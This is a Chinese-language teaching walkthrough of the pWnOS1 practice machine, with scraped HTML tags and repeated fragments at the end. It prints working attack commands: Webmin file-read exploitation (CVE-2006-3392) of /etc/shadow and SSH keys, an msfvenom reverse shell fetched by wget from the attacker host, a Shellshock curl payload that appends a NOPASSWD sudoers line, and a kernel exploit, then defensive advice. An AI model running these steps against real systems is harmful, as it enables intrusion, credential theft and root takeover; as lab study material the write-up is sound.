pWnOS1 靶机渗透测试教学文档<\/h1>

1. 靶机信息收集<\/h2>

1.1 网络发现<\/h3>

靶机IP网段：10.10.10.0\/24（静态IP）<\/li>

建议将攻击机IP配置到同一网段<\/li> <\/ul>

1.2 端口扫描<\/h3>

使用nmap进行端口扫描发现以下开放端口：<\/p>

22 (SSH)<\/li>
80 (HTTP)<\/li>
139 (NetBIOS)<\/li>
445 (SMB)<\/li>

10000 (Webmin)<\/li> <\/ul>

1.3 服务识别与漏洞扫描<\/h3>

使用nmap自带脚本进行详细扫描：<\/p>

nmap -sV -sC -p22,80,139,445,10000 <靶机IP>
<\/span><\/span><\/code><\/pre>发现关键漏洞：<\/p>

Webmin (10000端口)存在任意文件读取漏洞(CVE-2006-3392)<\/li>
<\/ul>
2. Webmin任意文件读取漏洞利用(CVE-2006-3392)<\/h2>
2.1 漏洞验证<\/h3>
访问http:\/\/<靶机IP>:10000<\/code>确认Webmin登录页面存在<\/p>
2.2 利用脚本选择<\/h3>
Exploit-DB上有两个可用脚本：<\/p>

PHP脚本<\/li>
Perl脚本<\/li>
<\/ol>
推荐使用PHP脚本，但可能需要安装额外扩展：<\/p>
sudo apt-get install php-curl
<\/span><\/span><\/code><\/pre>2.3 利用过程<\/h3>

下载PHP利用脚本<\/li>
执行脚本读取敏感文件：
php exploit.php <靶机IP> \/etc\/passwd
<\/span><\/span><\/code><\/pre><\/li>
成功读取后尝试读取shadow文件：
php exploit.php <靶机IP> \/etc\/shadow
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
注意：此漏洞利用时具有root权限<\/p>
3. SSH私钥获取与利用<\/h2>
3.1 获取SSH公钥<\/h3>
利用文件读取漏洞获取用户公钥：<\/p>
php exploit.php <靶机IP> \/home\/<用户名>\/.ssh\/authorized_keys
<\/span><\/span><\/code><\/pre>靶机上存在四个用户，需要逐一尝试<\/p>
3.2 私钥碰撞攻击<\/h3>

使用PRNG（伪随机数生成）方法进行私钥碰撞<\/li>
下载专用私钥库（如5622.txt）<\/li>
复制获取的公钥前几十位进行搜索匹配<\/li>
找到对应私钥文件（去掉公钥文件后缀）<\/li>
<\/ol>
3.3 SSH登录<\/h3>
使用获取的私钥登录：<\/p>
ssh -i <私钥文件> <用户名>@<靶机IP> -o PubkeyAcceptedKeyTypes=<\/span>+ssh-rsa
<\/span><\/span><\/code><\/pre>注意：需要添加-o PubkeyAcceptedKeyTypes=+ssh-rsa<\/code>参数解决密钥类型问题<\/p>
4. 提权方法<\/h2>
4.1 方法一：Webmin文件包含提权<\/h3>
4.1.1 准备Perl反向Shell<\/h4>

使用msfvenom生成：
msfvenom -p cmd\/unix\/reverse_perl LHOST=<\/span><攻击机IP> LPORT=<\/span><监听端口> -f raw > shell.cgi
<\/span><\/span><\/code><\/pre><\/li>
或使用Kali自带Perl Shell脚本<\/li>
<\/ol>
4.1.2 上传并执行<\/h4>

在攻击机开启HTTP服务：
python3 -m http.server 80<\/span>
<\/span><\/span><\/code><\/pre><\/li>
靶机下载：
wget http:\/\/<攻击机IP>\/shell.cgi -O \/tmp\/shell.cgi
<\/span><\/span>chmod +x \/tmp\/shell.cgi
<\/span><\/span><\/code><\/pre><\/li>
攻击机开启监听：
nc -lvnp <监听端口>
<\/span><\/span><\/code><\/pre><\/li>
通过文件包含漏洞执行：
php exploit.php <靶机IP> \/tmp\/shell.cgi
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.2 方法二：Bash Shellshock提权<\/h3>
4.2.1 漏洞验证<\/h4>
检查Bash版本：<\/p>
bash --version
<\/span><\/span><\/code><\/pre>若版本≤4.1，可能存在Shellshock漏洞<\/p>
测试命令：<\/p>
env x=<\/span>'() { :;}; echo vulnerable'<\/span> bash -c "echo this is a test"<\/span>
<\/span><\/span><\/code><\/pre>输出"vulnerable"则存在漏洞<\/p>
4.2.2 利用过程<\/h4>

创建提权脚本：
echo 'echo "vmware ALL=(ALL)NOPASSWD:ALL" >> \/etc\/sudoers'<\/span> > \/home\/vmware\/a.cgi
<\/span><\/span><\/code><\/pre><\/li>
使用curl执行：
curl http:\/\/10.10.10.129:10000\/unauthenticated\/..%01\/..%01\/..%01\/..%01\/..%01\/..%01\/..%01\/..%01\/..%01\/..%01\/..%01\/..%01\/home\/vmware\/a.cgi -A '() { :;}; \/bin\/bash \/home\/vmware\/a.cgi'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
验证提权：
sudo su
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.3 方法三：内核提权<\/h3>
4.3.1 内核版本检查<\/h4>
uname -a
<\/span><\/span><\/code><\/pre>确认内核版本为2.6.22（较老版本）<\/p>
4.3.2 利用过程<\/h4>

下载提权exp（如linux\/local\/5092.c）<\/li>
上传到靶机：
wget http:\/\/<攻击机IP>\/5092.c -O \/tmp\/5092.c
<\/span><\/span><\/code><\/pre><\/li>
编译并执行：
gcc 5092.c -o exp
<\/span><\/span>.\/exp
<\/span><\/span><\/code><\/pre><\/li>
获取root shell<\/li>
<\/ol>
5. 总结与防御建议<\/h2>
5.1 漏洞总结<\/h3>

Webmin任意文件读取漏洞(CVE-2006-3392)<\/li>
SSH密钥管理不当<\/li>
Bash Shellshock漏洞<\/li>
老旧内核漏洞<\/li>
<\/ol>
5.2 防御建议<\/h3>

及时更新Webmin到最新版本<\/li>
加强SSH密钥管理，禁用不安全的密钥类型<\/li>
升级Bash到最新版本<\/li>
定期更新操作系统内核<\/li>
限制文件读取权限，特别是敏感文件<\/li>
<\/ol>

pWnOS1 靶机渗透测试教学文档<\/h1>

1. 靶机信息收集<\/h2>

2. Webmin任意文件读取漏洞利用(CVE-2006-3392)<\/h2>

2.1 漏洞验证<\/h3> 访问http:\/\/<靶机IP>:10000<\/code>确认Webmin登录页面存在<\/p>

3. SSH私钥获取与利用<\/h2>

4.1 方法一：Webmin文件包含提权<\/h3>

4.2 方法二：Bash Shellshock提权<\/h3>

4.3 方法三：内核提权<\/h3>

5. 总结与防御建议<\/h2>

5.2 防御建议<\/h3> 及时更新Webmin到最新版本<\/li> 加强SSH密钥管理，禁用不安全的密钥类型<\/li> 升级Bash到最新版本<\/li> 定期更新操作系统内核<\/li> 限制文件读取权限，特别是敏感文件<\/li> <\/ol>

2.1 漏洞验证<\/h3>
访问`http:\/\/<靶机IP>:10000<\/code>确认Webmin登录页面存在<\/p>`

5.2 防御建议<\/h3>

及时更新Webmin到最新版本<\/li>
加强SSH密钥管理，禁用不安全的密钥类型<\/li>
升级Bash到最新版本<\/li>
定期更新操作系统内核<\/li>
限制文件读取权限，特别是敏感文件<\/li> <\/ol>